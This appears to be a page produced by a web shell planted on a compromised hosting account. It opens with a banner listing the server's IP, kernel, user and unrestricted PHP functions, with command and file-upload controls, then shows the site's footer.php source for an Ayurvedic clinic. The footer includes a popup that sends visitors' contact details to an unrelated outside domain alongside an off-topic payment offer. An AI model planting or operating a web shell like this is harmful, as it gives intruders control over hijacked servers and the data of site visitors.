MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 3.149.254.25
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/ppcad7no/indianherbaltreatment.com/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/indianherbaltreatment.com/footer.php
<div class="fixedcall">
   <a class="phonenumber" href="tel:<?php echo $datac['phone']; ?>"><span> <i class="fas fa-phone-volume"></i></span><p> <br><?php echo $datac['phone']; ?></p></a>
</div>
<div class="fixedwhatapp">
   <a class="phonenumber" href="https://wa.me/<?php echo $datac['whatsapp'];?>"><span><i class="fab fa-whatsapp"></i></span><p>WhatsApp<br><?php echo $datac['whatsapp'];?></p></a>
</div>
<div class="buybook">
   <a class="phonenumber" href=":tel:<?php echo $datac['phone']; ?>"><span><i class="fas fa-book"></i></span><p>Buy Book<br><?php echo $datac['phone']; ?></p></a>
</div>

<script src="https://cdn.jsdelivr.net/npm/sweetalert2@7.12.15/dist/sweetalert2.all.min.js"></script>
<link rel='stylesheet' href='https://cdn.jsdelivr.net/npm/sweetalert2@7.12.15/dist/sweetalert2.min.css'>
<link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">

<style>
    .customSwalBtn{
		background-color: rgb(115, 181, 30);
    border-left-color: rgba(214,130,47,1.00);
    border-right-color: rgba(214,130,47,1.00);
    border: 0;
    border-radius: 3px;
    box-shadow: none;
    color: #fff;
    cursor: pointer;
    font-size: 17px;
    font-weight: 500;
    margin: 10px 5px 0px 5px;
    padding: 10px 32px;
	}
	.customSwalBtn1{
		background-color: rgb(115, 181, 30);
    border-left-color: rgba(214,130,47,1.00);
    border-right-color: rgba(214,130,47,1.00);
    border: 0;
    border-radius: 3px;
    box-shadow: none;
    color: #fff;
    cursor: pointer;
    font-size: 17px;
    font-weight: 500;
    margin: 5px 5px 0px 5px;
    padding: 10px 32px;
	}
	.swal2-image {
    max-width: 100%;
    margin: 0.25em auto !important;
}
	.close {
    position: absolute;
    left: 96%;
    top: 13px;
    margin: -10px 0 0 -10px;
    width: 20px;
    height: 20px;
    color: #000000;
    font-size: 25px;
    font-weight: 500;
    text-align: center;
    border-radius: 50%;
    /* background-color: #5c5c5c; */
    cursor: pointer;
    text-decoration: none;
}
	input.fip {
		margin:auto;
    width: 80%;
    background: #f5f5f5;
    border: 0;
    padding: 20px;
    border-radius: 8px;
    margin-bottom: 10px;
    border: 1px solid #eee;
}
	.form-control {
    display: block;
    width: 100%;
    padding: .5rem .75rem;
    font-size: 1rem;
    line-height: 1.25;
    color: #55595c;
    background-color: #f9f9f9;
    background-image: none;
    -webkit-background-clip: padding-box;
    background-clip: padding-box;
    border: 1px solid rgba(0,0,0,.15);
    border-radius: .25rem;
}
.margin-below{
    margin-bottom: 1.2rem;
}
.form-control:focus {
    border-color: #7743ff;
    box-shadow: inset 0 1px 1px rgba(45, 45, 45, 0.07), 0 0 8px rgba(129, 129, 129, 0.6);
}
.btn2 {
	cursor:pointer;
    width: 80%;
    padding: 12px;
    border: 0;
    background: #3e7fb9;
    font-size: 1.1em;
    color: #fff;
    text-shadow: 1px 1px 0px rgba(0, 0, 0, .4);
    box-shadow: 0px 3px 0px #3e7fb9;
    margin-top: 1.2rem;
    border-radius: .25rem;
}
.btn2:hover {
    color: #fff;
    background: #3e7fb9;
    border-color: #3e7fb9;
}
	.swal2-title {

    color: #3e7fb9 !important;
	}
	#pop-msg{
    font-size: 14px;
    color: red;
    font-weight: 700;
}
	.swal2-container{
		z-index:999999999 !important;
	}
@media(min-width: 325px) and (max-width: 767px) {
  
  .swal2-title {

    font-size: 25px !important;
	}
  input.fip {
		margin:auto;
	  width: 100%;
	}
	.btn2{
		width:100%;
	}
}


    .buybook {
	position: fixed;
	width: 180px;
	height: 45px;
	margin: 0;
	padding: 0;
	top: 28%;
	right: -135px;
	z-index: 999;
	border-radius: 10px 0 0 10px;
	overflow: hidden;
	background: #fff;
	-webkit-transition: .4s;
	-moz-transition: .4s;
	-o-transition: .4s;
	transition: .4s;
}
.buybook .phonenumber {
	display: block;
	font-size: 14px;
	line-height: 16px;
	text-align: left;
	font-weight: 600;
	letter-spacing: .6px;
	text-decoration: none;
	color: #fff;
	margin: 0;
	padding: 0;
	-webkit-transition: .4s;
	-moz-transition: .4s;
	-o-transition: .4s;
	transition: .4s;
}
.buybook .phonenumber span{
	width: 45px;
	height: 45px;
	float: left;
	background: #b93e3e;
	font-size: 25px;
	margin: 0 15px 0 0;
	text-align: center;
	line-height: 45px;
	color: #fff;
}
.buybook .phonenumber p{
	margin: 0;
	padding: 7px;
color: #080808;
    font-weight: 600;
}
.phn{
  
    color: #3e7fb9;
  	font-size: 14px;
	line-height: 16px;
	text-align: left;
	font-weight: 600;
	letter-spacing: .6px;
	text-decoration: none;
}
.buybook .phonenumber span i {
	color: #fff;
	-webkit-animation: flipInY 1.25s infinite;
	-moz-animation: flipInY 1.25s infinite;
	-ms-animation: flipInY 1.25s infinite;
	animation: flipInY 1.25s infinite;
}

.fixedcall {
	position: fixed;
	width: 180px;
	height: 45px;
	margin: 0;
	padding: 0;
	top: 48%;
	right: -135px;
	z-index: 999;
	border-radius: 10px 0 0 10px;
	overflow: hidden;
	background: #fff;
	-webkit-transition: .4s;
	-moz-transition: .4s;
	-o-transition: .4s;
	transition: .4s;
}
.fixedcall a {
	display: block;
	font-size: 14px;
	line-height: 16px;
	text-align: left;
	font-weight: 600;
	letter-spacing: .6px;
	text-decoration: none;
	color: #fff;
	margin: 0;
	padding: 0;
	-webkit-transition: .4s;
	-moz-transition: .4s;
	-o-transition: .4s;
	transition: .4s;
}
.fixedcall a span{
	width: 45px;
	height: 45px;
	float: left;
	background: #143070;
	font-size: 25px;
	margin: 0 15px 0 0;
	text-align: center;
	line-height: 45px;
	color: #fff;
}
.fixedcall a p{
	margin: 0;
	padding: 7px;
	color: #080808;
    font-weight: 600;
}
.fixedcall a svg {
	color: #fff;
	-webkit-animation: tada 1.25s infinite;
	-moz-animation: tada 1.25s infinite;
	-ms-animation: tada 1.25s infinite;
	animation: tada 1.25s infinite;
}
.fixedwhatapp {
	position: fixed;
	width: 180px;
	height: 45px;
	margin: 0;
	padding: 0;
	top: 57%;
	right: -135px;
	z-index: 999;
	border-radius: 10px 0 0 10px;
	overflow: hidden;
	background: #fff;
	-webkit-transition: .4s;
	-moz-transition: .4s;
	-o-transition: .4s;
	transition: .4s;
}
.fixedwhatapp a {
	display: block;
	font-size: 14px;
	line-height: 16px;
	text-align: left;
	font-weight: 600;
	letter-spacing: .6px;
	text-decoration: none;
	color: #fff;
	margin: 0;
	padding: 0;
	-webkit-transition: .4s;
	-moz-transition: .4s;
	-o-transition: .4s;
	transition: .4s;
}
.fixedwhatapp a span{
	width: 45px;
	height: 45px;
	float: left;
	background: #4caf50;
	font-size: 25px;
	margin: 0 15px 0 0;
	text-align: center;
	line-height: 45px;
	color: #fff;
}
.fixedwhatapp a p{
	margin: 0;
	padding: 7px;
	color: #080808;
    font-weight: 600;
}
.fixedwhatapp a svg {
	color: #fff;
	-webkit-animation: flipInY 1.25s infinite;
	-moz-animation: flipInY 1.25s infinite;
	-ms-animation: flipInY 1.25s infinite;
	animation: flipInY 1.25s infinite;
}
.buybook:hover {
	right: 0;
}
.fixedwhatapp:hover {
	right: 0;
}
@-webkit-keyframes tada {
 0% {
 -webkit-transform: scale(1);
 transform: scale(1);
}
 10%, 20% {
 -webkit-transform: scale(0.9) rotate(-3deg);
 transform: scale(0.9) rotate(-3deg);
}
 30%, 50%, 70%, 90% {
 -webkit-transform: scale(1.1) rotate(3deg);
 transform: scale(1.1) rotate(3deg);
}
 40%, 60%, 80% {
 -webkit-transform: scale(1.1) rotate(-3deg);
 transform: scale(1.1) rotate(-3deg);
}
 100% {
 -webkit-transform: scale(1) rotate(0);
 transform: scale(1) rotate(0);
}
}
 @keyframes tada {
 0% {
 -webkit-transform: scale(1);
 -ms-transform: scale(1);
 transform: scale(1);
}
 10%, 20% {
 -webkit-transform: scale(0.9) rotate(-3deg);
 -ms-transform: scale(0.9) rotate(-3deg);
 transform: scale(0.9) rotate(-3deg);
}
 30%, 50%, 70%, 90% {
 -webkit-transform: scale(1.1) rotate(3deg);
 -ms-transform: scale(1.1) rotate(3deg);
 transform: scale(1.1) rotate(3deg);
}
 40%, 60%, 80% {
 -webkit-transform: scale(1.1) rotate(-3deg);
 -ms-transform: scale(1.1) rotate(-3deg);
 transform: scale(1.1) rotate(-3deg);
}
 100% {
 -webkit-transform: scale(1) rotate(0);
 -ms-transform: scale(1) rotate(0);
 transform: scale(1) rotate(0);
}
}
.tada {
	-webkit-animation-name: tada;
	animation-name: tada;
}
.fixedcall:hover {
	right: 0;
}
.fixedcall1:hover {
	right: 0;
}

@-webkit-keyframes flipInY {
  from {
    -webkit-transform: perspective(400px) rotate3d(0, 1, 0, 90deg);
    transform: perspective(400px) rotate3d(0, 1, 0, 90deg);
    -webkit-animation-timing-function: ease-in;
    animation-timing-function: ease-in;
    opacity: 0;
  }

  40% {
    -webkit-transform: perspective(400px) rotate3d(0, 1, 0, -20deg);
    transform: perspective(400px) rotate3d(0, 1, 0, -20deg);
    -webkit-animation-timing-function: ease-in;
    animation-timing-function: ease-in;
  }

  60% {
    -webkit-transform: perspective(400px) rotate3d(0, 1, 0, 10deg);
    transform: perspective(400px) rotate3d(0, 1, 0, 10deg);
    opacity: 1;
  }

  80% {
    -webkit-transform: perspective(400px) rotate3d(0, 1, 0, -5deg);
    transform: perspective(400px) rotate3d(0, 1, 0, -5deg);
  }

  to {
    -webkit-transform: perspective(400px);
    transform: perspective(400px);
  }
}

@keyframes flipInY {
  from {
    -webkit-transform: perspective(400px) rotate3d(0, 1, 0, 90deg);
    transform: perspective(400px) rotate3d(0, 1, 0, 90deg);
    -webkit-animation-timing-function: ease-in;
    animation-timing-function: ease-in;
    opacity: 0;
  }

  40% {
    -webkit-transform: perspective(400px) rotate3d(0, 1, 0, -20deg);
    transform: perspective(400px) rotate3d(0, 1, 0, -20deg);
    -webkit-animation-timing-function: ease-in;
    animation-timing-function: ease-in;
  }

  60% {
    -webkit-transform: perspective(400px) rotate3d(0, 1, 0, 10deg);
    transform: perspective(400px) rotate3d(0, 1, 0, 10deg);
    opacity: 1;
  }

  80% {
    -webkit-transform: perspective(400px) rotate3d(0, 1, 0, -5deg);
    transform: perspective(400px) rotate3d(0, 1, 0, -5deg);
  }

  to {
    -webkit-transform: perspective(400px);
    transform: perspective(400px);
  }
}

.flipInY {
  -webkit-backface-visibility: visible !important;
  backface-visibility: visible !important;
  -webkit-animation-name: flipInY;
  animation-name: flipInY;
}



</style>

<script>
    document.querySelector(".offer").addEventListener("click", function() {
  swal({
    title: "",
    text: "Do you want to make Consistent Profits?",
    imageUrl: "https://websitica.com/wp-content/uploads/2016/05/website-logo.png",
    imageWidth: 350,
    imageHeight: 100,
    imageAlt: "Intraday Income",
    html: "<hr><h2 class='swal2-title' id='swal2-title'>Pay a Token advance and avail this one-time offer!! </h2>Pay a Token advance of Rs.1000/- to this one-time avail free offer on <b style='color:#3e7fb9; font-size: 18px;'>Social Media Managing Platform worth Rs.7000/-</b> <br>(applicable only for one day from the date of estimation sent)." +
            "<br>" +
            '<!--<button type="button" role="button" tabindex="0" class="SwalBtn1 customSwalBtn">' + 'Free Consultation' + '</button>-->' +
            '<div id="pop-msg"></div> <button data-pixel="lead4" class="btn2 btn-primary"  >Pay Now</button> <span  class="close enrollclose"><i class="fa fa-times-circle-o" aria-hidden="true"></i></span>',
        showCancelButton: false,
        showConfirmButton: false
  });
});

(function($) {
  $('body').on('click', ".enrollclose", function() {
		swal.close();
});
              }( jQuery ));

function popup(){
  
  swal({
    title: "",
    text: "Do you want to make Consistent Profits?",
    html: "<h2 class='swal2-title' id='swal2-title'>Enquire Now</h2>" +
            '<!--<button type="button" role="button" tabindex="0" class="SwalBtn1 customSwalBtn">' + 'Free Consultation' + '</button>-->' +
            '<form id="getform"> <div class="form-group margin-below"> <input type="text" name="name" class="form-control fip" id="name" aria-describedby="Name" placeholder="Name"> </div> <div class="form-group margin-below"><input type="email" name="email" id="email" class="form-control fip" placeholder="Email Address"> <input type="number" name="number" class="form-control fip" id="number" aria-describedby="Number" placeholder="Mobile Number" onKeyPress="if(this.value.length==10) return false;"> <input type="text" name="message" class="form-control fip" placeholder="Message (Optional)"></div></form><div id="pop-msg"></div>  <button data-pixel="lead4" class="btn2 btn-primary"  >Submit</button> <span  class="close enrollclose"><i class="fa fa-times-circle-o" aria-hidden="true"></i></span>',
        showCancelButton: false,
        showConfirmButton: false
  });
}

$('body').on('click', ".btn2", function() {
		
		console.log("btn click");
	var fdata = $("#getform").serialize();
		var email=$("#email").val();
		var number=$("#number").val();
		if(email!=""){
			if(number!=""){
			   $.ajax({
        url: "https://ignitededufuture.com/popup/savedata.php",
        type: "post",
        data: fdata,
		beforeSend: function() {
        // setting a timeout
        $("#pop-msg").html("Please Wait...!");
		$(".btn2").prop('disabled', true);
        
    },
        success: function(response) {
			$(".btn2").prop('disabled', false);
            console.log(response);
             if(response=="success"){
				 $("#pop-msg").html("Successfully submitted.!").css("color","green");
				setTimeout(function(){  swal.close();}, 3000);
			 }else{
				 $("#pop-msg").html(response); 
			 }
        }

    });
				}else{
					$("#pop-msg").html("Please fill out Number correctly");
}
		}else{
			$("#pop-msg").html("Please fill out email correctly");
		}
			//alert(fdata);
		 
});	
</script>
<footer class="footer-area footer-bg">
        <div class="container">
            <div class="footer-top pt-100 ">
                <div class="row">
                    <div class="col-lg-4 col-sm-6">
                        <div class="footer-widget">
                            <div class="footer-logo">
                                <a href="<?php echo $wspath?>">
                                <img style="width: 120px;" src="<?php echo $wspath?>admin/images/<?php echo $dataf['footer_logo'];?>" class="logo-one" alt="Ibrahim-Ayurvedic-Khandani-Dawakhana">
                                </a>
                            </div>
                            <p><?php echo $dataf['short_about'];?></p>
                           
                        </div>
                    </div>
                    <div class="col-lg-2 col-sm-6">
                        <div class="footer-widget pl-2">
                            <h3>Quick Links</h3>
                            <ul class="footer-list">
                                <li>
                                    <a href="<?php echo $wspath?>" target="_blank">
                                        <i class='bx bx-chevron-right'></i>
                                         Home
                                    </a>
                                </li>
                                <li>
                                    <a href="<?php echo $wspath?>about.html" target="_blank">
                                        <i class='bx bx-chevron-right'></i>
                                        About Us
                                    </a>
                                </li>
                               
                                <li>
                                    <a href="<?php echo $wspath?>contact.html" target="_blank">
                                        <i class='bx bx-chevron-right'></i>
                                        Contact
                                    </a>
                                </li>
                            
                            </ul>
                        </div>
                    </div>
                    <div class="col-lg-3 col-sm-6">
                        <div class="footer-widget ">
                            <h3>Contact Us</h3>
                            <ul class="footer-blog">
                                <li>
                                <p><i class="fa fa-map"></i> <?php echo $datac["address"]; ?></p>
                                <li>
                                <a href="tel:<?php echo $datac['phone']; ?>"><i class="fa fa-phone"></i><?php echo $datac['phone']; ?></a>
                                </li>
                                </li>
                                <li>
                                <a href="mailto:<?php echo $datac["email"]; ?>"><i class="fa fa-envelope"></i> <?php echo $datac["email"]; ?></a>
                                </li>
                            </ul>
                        </div>
                    </div>
                    <div class="col-lg-3 col-sm-6">
                        <div class="footer-widget">
                        <iframe src="<?php echo $datac['map_link']; ?>" width="100%" height="300" style="border:0;" allowfullscreen="" loading="lazy" referrerpolicy="no-referrer-when-downgrade"></iframe>
                           
                        </div>
                    </div>
                </div>
            </div>
            <div class="copy-right-area">
                <div class="copy-right-text">
                    <p>
                        Copyright ©
                        <script>document.write(new Date().getFullYear())</script> <a href="index.php">Ibrahim Ayurvedic Khandani Dawakhana</a>, All Rights Reserved. Designed And Developed by <a href="https://www.webkeyindia.com/">Webkeyindia.com</a>.
                        
                    </p>
                </div>
            </div>
        </div>
    </footer>

<script>
    // Function to toggle the blinking effect on the button
function toggleBlinking() {
    var button = document.getElementById("blink-button");
    button.classList.toggle("blink-border");
}

// Start blinking on page load (optional)
toggleBlinking();

// If you want to toggle the blinking on a certain event (e.g., button click)
// You can use the following code:
// var button = document.getElementById("blink-button");
// button.addEventListener("click", toggleBlinking);
</script>


    <script src="assets/js/jquery.min.js"></script>

    <script src="assets/js/bootstrap.bundle.min.js"></script>

    <script src="assets/js/owl.carousel.min.js"></script>

    <script src="assets/js/jquery.magnific-popup.min.js"></script>

    <script src="assets/js/jquery.nice-select.min.js"></script>

    <script src="assets/js/wow.min.js"></script>

    <script src="assets/js/meanmenu.js"></script>

    <script src="assets/js/jquery.ajaxchimp.min.js"></script>

    <script src="assets/js/form-validator.min.js"></script>

    <script src="assets/js/contact-form-script.js"></script>

    <script src="assets/js/custom.js"></script>

MMCT - 2023